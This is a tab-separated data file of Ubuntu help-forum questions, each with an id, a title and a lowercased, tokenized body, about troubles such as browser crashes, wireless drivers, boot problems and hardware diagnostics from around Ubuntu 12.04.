174988	chromium crashing very often on ubuntu 12.04	i have changed to chromium recently ( as it works faster than opera that i used to use ) but i have noticed that it crashes a lot under very , very random circumstances . sometimes it can go for hours , working just fine and then it will crash few times in 15 minutes and then work fine again . this is my debug session end ( when it crashed ) from gdb in console ( not much but still better than nothing ) ( exe:4208 ) : glib-critical ** : g_hash_table_destroy : assertion `hash_table ! = null ' failed ( exe:4208 ) : glib-critical ** : g_hash_table_destroy : assertion `hash_table ! = null ' failed ( exe:4208 ) : glib-critical ** : g_hash_table_destroy : assertion `hash_table ! = null ' failed [ thread 0x7fffe196e700 ( lwp 1182 ) exited ] [ new thread 0x7fffd2146700 ( lwp 1212 ) ] [ thread 0x7fffd2146700 ( lwp 1212 ) exited ] [ new thread 0x7fffe196e700 ( lwp 1213 ) ] program received signal sigsegv , segmentation fault . 0x0000000000000000 in ? ? ( ) i am using nvidia drivers and do not know if this has something to do with it because sometimes i get this message failed to open vdpau backend libvdpau_nvidia.so : can not open shared object file : no such file or directory
174995	how do i set up user level restrictions on a gateway ?	i am aware that ubuntu server can be used as a gateway to allow internet connection to a lan . then we use ip tables or other firewall settings to restrict ( for example ) , certain websites from being accessed . my question : can this restriction be done on individual users , and if so could some please share a link or resource that i may use for this purpose ?
174996	live usb ignored during startup	i created a live usb using pendrive , but when i start my computer it simply ignores the drive . it tells me `` no bootable device '' ( this is normal , there is no os on the computer ) , but even when the usb is plugged in . i 've tried reinstalling on the drive ( no luck ) , and it wo n't boot to the drive even when the usb is manually selected from the bios menu . strangely enough , on another computer if i open the flash drive on windows and open `` wubi.exe '' , then select to restart the computer , it boots from the drive normally . any idea how to fix this ?
174997	is it safe to delete the .jpg images in my music folder ?	i 'm new to ubuntu and have used windows all my life so i do n't really know what is normal and what is not . when i put my music on a flash drive to copy over to ubuntu from windows , a huge number of .jpg images come with them but you can only see them in ubuntu . i was wondering if those where like my album pictures that are on the music , or is it safe to delete them ? they are really bothering me but since i do n't know how things work outside of windows i do n't know what 's safe and what 's not . i would really like to delete them , but not if it means removing my cover art from my music .
175004	how can i debug what 's slowing down new session logins ?	for a while , i 've had an issue whereby it takes up to 5 minutes from the moment i enter my password in lightdm 's login screen until i can do anything with my computer . that 's on ubuntu 12.04 . during that time , i see there is disk activity , but i 'm not sure how to figure out what 's causing it and whether that is the real cause . i 've played around with bootchart unsuccessfully . any ideas on what the best way to debug this issue is ?
175009	why ca n't i install the pino twitter client in 12.04 ?	i did a search for pino the twitter client and it comes up but when i click more info it says here is a screen shot of it here :
175015	which user is running tomcat ?	i have a tomcat 7 server running on amazon ec2 ( os - ubuntu 12 lts ) . how can i find out which user is running tomcat on amazon ec2 ?
175017	can not boot into windows 7 after installing 12.04	i installed 12.04 by using wubi windows installer on my windows 7 computer . i installed ubuntu with the same partition ( c : \ ) with windows 7 . when i boot my computer , the boot manager does not come out and it directly boots into 12.04 . so i can not boot into windows . how can i make the boot manager come out to choose my boot option ?
175026	can i remove compiz and still run gnome desktop ?	i just installed ubuntu 12.04 onto a fairly old desktop machine . i installed gnome desktop without problem . nothing else was installed other than g++ and eclipse . i do n't know what compiz is , but i keep getting compiz crash reports at login now ( with gnome classic option ) . it does n't seem critical and does n't effect the running of the machine , at least in an obvious way . the errors seemed to start happening after installing the gnome desktop . can i ignore this crash report or is it something to be worried about ? can i remove compiz or is it crucial to ubuntu running ?
175029	laptop is not able to access hotmail & facebook	i am having a strange problem with my laptop.i am using ubuntu 12.04 on dell inspiron 1545.i use internet through wireless router.i have been using internet successfully without any kind of problem but now i am facing a weird problem . the problems are : my laptop is not opening facebook.sometimes it opens login page but after entering usrname and passwd and clicking login.it just shows `` connecting '' message for a while then shows `` request time out '' message . same problem is with hotmail except hotmail is always opening its login page.but nothing furthure . the strangest problem is with youtube . i am able to see videos without logging in . but after login youtube shows a message `` an error occured please try again latter '' . and every browser on my laptop is showing same problem including firefox , chrome , chromium . and i have windows 7 too on the same system . and i am not facing any problem on windows 7 .
175032	how to adjust monitor color balance with open source radeon drivers ?	my display is too blueish , i would like to adjust its color balance .
175033	in unity , how do i see the details of a given launcher ?	i have a few launchers in unity that i might want to run as sudo once or twice , but i have no idea what to type into the terminal . at the moment , crazily , i have to run the app , then search for likely candidates in system monitor ! i do n't think the unity design team intend , ever , to give us a right-click action on the dash , or a `` details '' option if i right-click on a launcher , so ... how do i figure out what 's actually being executed when i run a launcher ? ( for the curious , what i 'm struggling with is desura - it 's not in the system path , so i ca n't just whereis desura , assuming desura is what 's actually being run - i 'd be guessing ) [ edit : using the method i marked as the answer , i can see that desura installs in my home directory and as it 's a non-root install , it does n't update the system path . ]
175035	how do i configure an asus n56vm ?	i 'm trying to configure all the hardware and make sure that everything is working on an asus n56vm-s4060x . i 've made some progress based on other answers , but there are still a number of things that are n't working . from a fresh install i have done the following , installed kernel 3.5 ( following these instructions , based on this answer installed asus-wmi ( not sure if this is necessary though ) installed asus-wmi v999.01 installed bumblebee tried to compile the alx module for ethernet ( failed ) after i installed kernel 3.5 the touchpad right click worked . after installing the asus-wmi the fn keys worked , except for the brightness functions . after i installed bumblebee the launcher no longer displays the icons , but still works if you click in the right place . the other change i saw was the the task switcher ( alt-tab ) was different , but does not display the expected image . i tried to compile the alx driver but after following the instructions had this error , make -c /lib/modules/3.5.0-9-generic/build m=/home/duncan/src/compat-wireless-2012-07-03-p modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.5.0-9-generic' scripts/makefile.build:44 : /home/duncan/src/compat-wireless-2012-07-03 p/drivers/net/ethernet/atheros/alx/makefile : no such file or directory make [ 4 ] : *** no rule to make target `/home/duncan/src/compat-wireless-2012-07-03-p/drivers/net/ethernet/atheros/alx/makefile ' . stop . make [ 3 ] : *** [ /home/duncan/src/compat-wireless-2012-07-03-p/drivers/net/ethernet/atheros/alx ] error 2 make [ 2 ] : *** [ /home/duncan/src/compat-wireless-2012-07-03-p/drivers/net/ethernet/atheros ] error 2 make [ 1 ] : *** [ _module_/home/duncan/src/compat-wireless-2012-07-03-p ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.5.0-9-generic' make : *** [ modules ] error 2 some other things which are not quite right : right click area of the mouse pad can result in a left-click screen does not automatically dim when removing the power cord so the questions : how do i get the geforce gt 630m to work correctly ? ( and how do i know if it is being used instead of the intel graphics ? ) how do i get the brightness keys to work ? do i need a particular version of the alx module ? what else might i need that i am missing ? does the asus-wmi provide all of the necessary power management features ? is there a way to stop certain areas of the touchpad from being a left click ? i.e . i want to prevent left-clicks when i am trying to right click what do i need to install for more advanced power management ?
175036	can not install libreoffice 3.6 from binary	so , i downloaded the main installer for libreoffice 3.6 from the official website , because it has n't yet arrived in ppa . followed the instructions just as the readme file suggests ( navigate to the extracted folder from terminal , and type `` sudo dpkg -i *.deb '' ) , but halfway through the installation , i get this error : setting up libreoffice3.6-calc ( 3.6.0.4-104 ) ... processing triggers for menu ... in file `` /usr/share/menu/introduceppa '' , at ( or in the definition that ends at ) line 4 : ? package ( introduceppa ) : needs= '' x11 '' section `` applications/file management '' title= '' introduce ppa '' command= '' /usr/bin/introduceppa.gambas '' icon= '' /usr/share/pixmaps/introduceppa.png '' ^ expected : `` = '' skipping file because of errors ... what does it mean ? how do i fix it ?
175037	does 12.04 support hibernating to a swap file ?	i 'm about to reinstall ubuntu on a netbook with a tiny disk . because of the tiny disk size , i 'd strongly prefer to have a swap file than a swap partition . however , i want to be able to hibernate . i know that hibernation needs to be manually enabled . i also know that hibernation to a swap file works on the old eeebuntu that i 'll be replacing , so hardware support is not a concern . does the precise kernel support hibernation to a swap file ? what if anything do i need to configure ? please note that i 'm looking for reliable , up-to-date information . i do n't mind if hibernation is n't supported out-of-the-box , but i 'd prefer not to have to recompile a kernel if i can do without . i 'll balk at patching the kernel for that machine .
175042	how to get breadcrumbs in nautilus ?	the navigation toolbar on nautilus always shows an editable text version of the current folder . how do i get it to show clickable breadcrumbs ? i am running nautilus 3.4.2 on ubuntu 12.04 .
175046	10.04 install flash player , get white screen	it does not matter how i install the adobe flash player . when i check to see if it works on hulu or youtube i either get a plain white screen , or a plain black screen where the video should be . this is a fresh installation of 10.04 , b/c i thought maybe another plugin was blocking it or something . i have tried downloading from the adobe site , from fire fox add missing plugins , the ubuntu software center , and manually through the command prompt . nothing seems to be working . any help and any ideas would be greatly welcomed !
175047	gnome utility to limit computer use ?	i used to use a utility in gnome2 . i would set it for ever hour or so , lock the screen for ten minutes . it was great ; it could n't be turned off or disabled and really helped me break away from the computer sometimes . but now , i totally forgot how to access it . it was something in the top panel i think ... i remember it would show a little bar graph in the panel ; when the bar graph filled up it would lock the display . does this ring a bell with anyone ? thank you ! edit : found this post , listing gnome-nanny , timepkr , and timeoutd . but none of those are what i 'm looking for ... how do i restrict my kids ' computing time ?
175054	how to find owner and group of a directory ?	how can i find out owner and group of a directory in ubuntu ?
175056	shotwell not writing metadata tags to images	i 've checked the box in preference to save metadata to images , but it 's not saving tags or titles to the jpg files . anyone else having this problem ?
175059	damaged jack port - sound only on headphones	i have damaged jack input and my system thinks i have headphones plugged in . on a windows machine i was able to manually switch from headphones to speakers permanently . how i can do this in ubuntu ?
175066	fuzzy text in unity title bar	since upgrading to precise , the text in the unity title bar is fuzzy . i thought this might be my general font settings , but window titles , which seem to use the exact same font , do n't have this problem at all . here 's a screenshot , showing the unity title bar just above a window title bar showing the same text : if you zoom in , you can see a green shadow effect in the unity title bar text .
175067	xubuntu ad-hoc network with wpa	my laptop is connected to the internet by ethernet cable , and in ubuntu i was able to setup a wireless network that my phone could connect to ( i think it was network settings , wireless , then there was s wireless hotspot button ) . in xubuntu , i go : network connections , wireless add , set it up as `` ad hoc '' and then `` shared to other computers '' , but it offers no option of wpa ( and my phone 's having difficulty connecting to the wep ) . which i think was the security offered in the ubuntu ad-hoc network . how do i get wpa in xubuntu ?
175070	is there an amazon downloader for purchased music ?	is there an amazon down loader for purchased music in 12.04 ? there was one for 11.10 that worked but i find nothing in the software center for 12.04 . thanks in advance . bob .
175077	ca n't find the wireless network on toshiba satellite ?	i bought new toshiba satellite c870-10l and just installed ubuntu 12.04 . however , i ca n't find any wireless connection . i have following hardware for networking : integrated ethernet 10/100 ethernet wireless integrated wireless 802.11bgn this is what i have tried so far in terminal ( commands and output given below ) : lspci -vvv 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) subsystem : toshiba america info systems device fb41 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=fast > tabort- < tabort- < mabort+ > serr- < perr- intx- latency : 0 capabilities : < access denied > 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) ( prog-if 00 [ normal decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes bus : primary=00 , secondary=01 , subordinate=06 , sec-latency=0 i/o behind bridge : 00004000-00004fff memory behind bridge : c2000000-c2ffffff prefetchable memory behind bridge : 00000000b0000000-00000000bfffffff secondary status : 66mhz- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- < serr- < perr- bridgectl : parity- serr- noisa- vga+ mabort- > reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) ( prog-if 30 [ xhci ] ) subsystem : toshiba america info systems device fb41 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 42 region 0 : memory at c3100000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : xhci_hcd 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) subsystem : toshiba america info systems device fb41 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 44 region 0 : memory at c3114000 ( 64-bit , non-prefetchable ) [ size=16 ] capabilities : < access denied > kernel driver in use : mei kernel modules : mei 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : toshiba america info systems device fb41 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 16 region 0 : memory at c3119000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci_hcd 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) subsystem : toshiba america info systems device fb41 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 47 region 0 : memory at c3110000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) ( prog-if 00 [ normal decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes bus : primary=00 , secondary=07 , subordinate=07 , sec-latency=0 i/o behind bridge : 0000f000-00000fff memory behind bridge : fff00000-000fffff prefetchable memory behind bridge : 00000000fff00000-00000000000fffff secondary status : 66mhz- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort+ < serr- < perr- bridgectl : parity- serr- noisa- vga- mabort- > reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1c.1 pci bridge : intel corporation panther point pci express root port 2 ( rev c4 ) ( prog-if 00 [ normal decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes bus : primary=00 , secondary=08 , subordinate=08 , sec-latency=0 i/o behind bridge : 00003000-00003fff memory behind bridge : c3000000-c30fffff prefetchable memory behind bridge : 00000000fff00000-00000000000fffff secondary status : 66mhz- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- < serr- < perr- bridgectl : parity- serr- noisa- vga- mabort- > reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1c.2 pci bridge : intel corporation panther point pci express root port 3 ( rev c4 ) ( prog-if 00 [ normal decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes bus : primary=00 , secondary=09 , subordinate=0e , sec-latency=0 i/o behind bridge : 00002000-00002fff memory behind bridge : c1000000-c1ffffff prefetchable memory behind bridge : 00000000c0000000-00000000c0ffffff secondary status : 66mhz- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- < serr- < perr- bridgectl : parity- serr- noisa- vga- mabort- > reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : toshiba america info systems device fb41 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 23 region 0 : memory at c3118000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci_hcd 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) subsystem : toshiba america info systems device fb41 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 capabilities : < access denied > kernel modules : itco_wdt 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : toshiba america info systems device fb41 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz+ udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin b routed to irq 41 region 0 : i/o ports at 5048 [ size=8 ] region 1 : i/o ports at 5054 [ size=4 ] region 2 : i/o ports at 5040 [ size=8 ] region 3 : i/o ports at 5050 [ size=4 ] region 4 : i/o ports at 5020 [ size=32 ] region 5 : memory at c3117000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : < access denied > kernel driver in use : ahci 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) subsystem : toshiba america info systems device fb41 control : i/o+ mem+ busmaster- speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap- 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- interrupt : pin c routed to irq 10 region 0 : memory at c3115000 ( 64-bit , non-prefetchable ) [ size=256 ] region 4 : i/o ports at 5000 [ size=32 ] kernel modules : i2c-i801 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati whistler le [ amd radeon hd 6625m graphics ] ( prog-if 00 [ vga controller ] ) subsystem : toshiba america info systems device fb41 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 45 region 0 : memory at b0000000 ( 64-bit , prefetchable ) [ size=256m ] region 2 : memory at c2000000 ( 64-bit , non-prefetchable ) [ size=128k ] region 4 : i/o ports at 4000 [ size=256 ] expansion rom at c2040000 [ disabled ] [ size=128k ] capabilities : < access denied > kernel driver in use : radeon kernel modules : radeon 01:00.1 audio device : advanced micro devices [ amd ] nee ati turks hdmi audio [ radeon hd 6000 series ] subsystem : toshiba america info systems device fb41 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin b routed to irq 46 region 0 : memory at c2020000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 08:00.0 network controller : realtek semiconductor co. , ltd. device 8723 subsystem : realtek semiconductor co. , ltd. device 0723 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 10 region 0 : i/o ports at 3000 [ size=256 ] region 2 : memory at c3000000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > 09:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) subsystem : toshiba america info systems device fb37 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 43 region 0 : i/o ports at 2000 [ size=256 ] region 2 : memory at c0004000 ( 64-bit , prefetchable ) [ size=4k ] region 4 : memory at c0000000 ( 64-bit , prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : r8169 kernel modules : r8169 lsmod module size used by ums_realtek 17920 0 uas 17828 0 usb_storage 39646 1 ums_realtek snd_hda_codec_hdmi 31775 1 sparse_keymap 13658 0 bnep 17830 2 rfcomm 38139 0 bluetooth 158438 10 bnep , rfcomm parport_pc 32114 0 ppdev 12849 0 snd_hda_codec_realtek 174222 1 snd_hda_intel 32765 5 snd_hda_codec 109562 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel snd_hwdep 13276 1 snd_hda_codec snd_pcm 80845 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec psmouse 72919 0 serio_raw 13027 0 snd_seq_midi 13132 0 snd_rawmidi 25424 1 snd_seq_midi snd_seq_midi_event 14475 1 snd_seq_midi snd_seq 51567 2 snd_seq_midi , snd_seq_midi_event joydev 17393 0 uvcvideo 67203 0 snd_timer 28931 2 snd_pcm , snd_seq radeon 737789 4 videodev 86588 1 uvcvideo snd_seq_device 14172 3 snd_seq_midi , snd_rawmidi , snd_seq video 19068 0 ttm 65344 1 radeon drm_kms_helper 45466 1 radeon drm 197692 6 radeon , ttm , drm_kms_helper toshiba_bluetooth 12711 0 wmi 18744 0 snd 62064 20 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device mac_hid 13077 0 i2c_algo_bit 13199 1 radeon soundcore 14635 1 snd snd_page_alloc 14108 2 snd_hda_intel , snd_pcm mei 36570 0 lp 17455 0 parport 40930 3 parport_pc , ppdev , lp usbhid 41906 0 r8169 56321 0 hid 77367 1 usbhid ifconfig -a eth0 link encap : ethernet hwaddr 4c:72 : b9:1a:2f : e7 inet addr:192.168.1.5 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :4e72 : b9ff : fe1a:2fe7/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:584588 errors:0 dropped:0 overruns:0 frame:0 tx packets:335858 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:801442328 ( 801.4 mb ) tx bytes:24323663 ( 24.3 mb ) interrupt:43 base address:0xe000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:991 errors:0 dropped:0 overruns:0 frame:0 tx packets:991 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:119419 ( 119.4 kb ) tx bytes:119419 ( 119.4 kb ) iwconfig lo no wireless extensions . eth0 no wireless extensions . sudo lshw -class network [ sudo ] password for tryggvi : *-network unclaimed description : network controller product : realtek semiconductor co. , ltd. vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:08:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : ioport:3000 ( size=256 ) memory : c3000000-c3003fff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : 05 serial : 4c:72 : b9:1a:2f : e7 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8105e-1.fw ip=192.168.1.5 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:43 ioport:2000 ( size=256 ) memory : c0004000-c0004fff memory : c0000000-c0003fff rfkill list all sudo lshw -class network [ sudo ] password for tryggvi : *-network unclaimed description : network controller product : realtek semiconductor co. , ltd. vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:08:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : ioport:3000 ( size=256 ) memory : c3000000-c3003fff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : 05 serial : 4c:72 : b9:1a:2f : e7 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8105e-1.fw ip=192.168.1.5 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:43 ioport:2000 ( size=256 ) memory : c0004000-c0004fff memory : c0000000-c0003fff
175078	image wo n't download in ubuntu one files for android v1.2.3	i did the following : drop an image in my ubuntu one folder on linux , wait for it to sync , refresh my ubuntu one files app on my android phone , see the image file in the listing . tap the image file name . expected : the image downloads , and i can use it as my phone 's wallpaper . actual : it displays a preview of the image but does n't download it and the file name remains greyed indicating `` not present on device '' . there is no feature available from the preview except `` share link '' . long-press offers `` share link '' , `` rename '' and `` delete '' . no option offered for `` download to device '' . tried with and without a wi-fi connection . app version 1.2.3 according to the settings panel .
175080	set up wireless in ubuntu 12.04	i just installed ubuntu 12.04 on a seperate drive . i can choose which drive to boot to in bios ubuntu boots great . i am however , unable to set up my wireless connection . could someone please help ...
175084	does anyone know the name of this program ?	does anyone know the name of this program ? here are some pics . please help i have been looking for it non-stop over 2 weeks now . please help ! scroll through the album and if you know please tell me it 's a program about composing . http : //www.flickr.com/photos/41628139 @ n05/7769183380/in/photostream/lightbox/
175091	ca n't boot after up upgrade to 12.04	i have as asus 1005pe which i tried to upgrade from 10.04 to 12.04 . it seems to stop loading at user bootsplash and hangs forever . unfortunately , the machine does n't have a cd drive and wo n't start from a usb disk , so using a live image is not an option . my only hope is that i can get into a terminal screen . please help .
175104	how do i install bcm43142 wireless drivers for dell vostro 3460/3560 ?	i have a dell vostro 3460 with one of the new broadcom 43142 hybrid wireless/bluetooth chips . neither the proprietary driver ( wl ) nor the b43 driver supports this . lspci -nn gives me 01:00.0 network controller [ 0280 ] : broadcom corporation device [ 14e4:4365 ] ( rev 01 ) 02:00.0 ethernet controller [ 0200 ] : atheros communications inc. ar8161 gigabit ethernet [ 1969:1091 ] ( rev 10 ) i manage to install 1969:1091 with compat-wireless ' alx , but could not find any alternative for this broadcom 4365 ... do you guys know any driver for this controller ? i am seriously considering to buy a compatible usb card ?
175116	why isnt there a create launcher on desktop right click ?	as the title says , i like unity and its new look . but why isnt there a choice to create a launcher on the desktop by right clicking ? i am currently using xfce desktop instead just because of this . to much hassle to create launchers or links to websites with unity . also it probably wouldnt hurt to have some templates for creating new files . such as text files and picture files etc . edit : yes i wonder why it was removed , why did the developers remove it ? what reasons ?
175119	i ca n't write in windows partition , but i 've done it before	before , i could save images downloaded from the web in the windows partition . even i could transfer files and all that . but today , i ca n't do it anymore . some days ago , i was trying to resize ubuntu and windows partition . i downloaded gparted , and i tried to shrink the windows partition , then increase the ubuntu partition , but as i could n't do that , i never applied the windows ' shrinking . i mentioned this because i think it caused this problem . when i tried to transfer some file or save an image from the web as i did before , there appears a message which says the partition has no writing permission , that is read-only , or something like that . could someone help me ? if you need more specific info , ask me please .
175121	volume jumps to 100 % when inserting or removing headphones	i am running ubuntu 12.04 on a lenovo thinkpad t530 . when i insert my headphones , the volume jumps to 100 % , even if it was set lower before i inserted them ( and also was lower the last time i used the headphones ) . if i then lower the volume and remove the headphones , the volume jumps to 100 % again . the only exception is that if the volume is muted , it stays muted when i insert or remove the headphones . any suggestions for what might be causing this ? lspci shows this audio device : 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 )
175122	how can i delete an administrator account from the guest login ?	how can i delete a administrators account without the password ? i bought laptop from ebay i am the 3rd owner ; 2nd owner had no password got password changed but still wont let me in as admin . i need to delete the first owner 's admin account to get a second-hand laptop to work ; i ca n't reinstall ubuntu because i ca n't play dvds . i can only login to the guest account .
175125	kernel panics when attempting to use non-mirrored dual monitors w/ ati x1900	i think it may be related to this bug , but i 'm not sure . i took a picture of the kernel panic with my phone , and here 's the ( i think ) interesting part of the panic : kernel panic - not syncing : fatal exception in interrupt pid : 3003 , comm : xorg tainted : p d w o 3.2.0-29-generic # 46-ubuntu call trace : panic occurred , switching back to text console does anyone know how to troubleshoot this , or add value to an existing bug report ?
175136	help with : `` dev/mapper/cryptswap1 has no valid partition ''	i 'm a new user guessing i messed something up on install or while i 've been messing around . this message keeps popping up and seems to be the root of a few problems i 'm having . what kind of problem is it ? i 'd like to know if you know . and of course how can i fix it ?
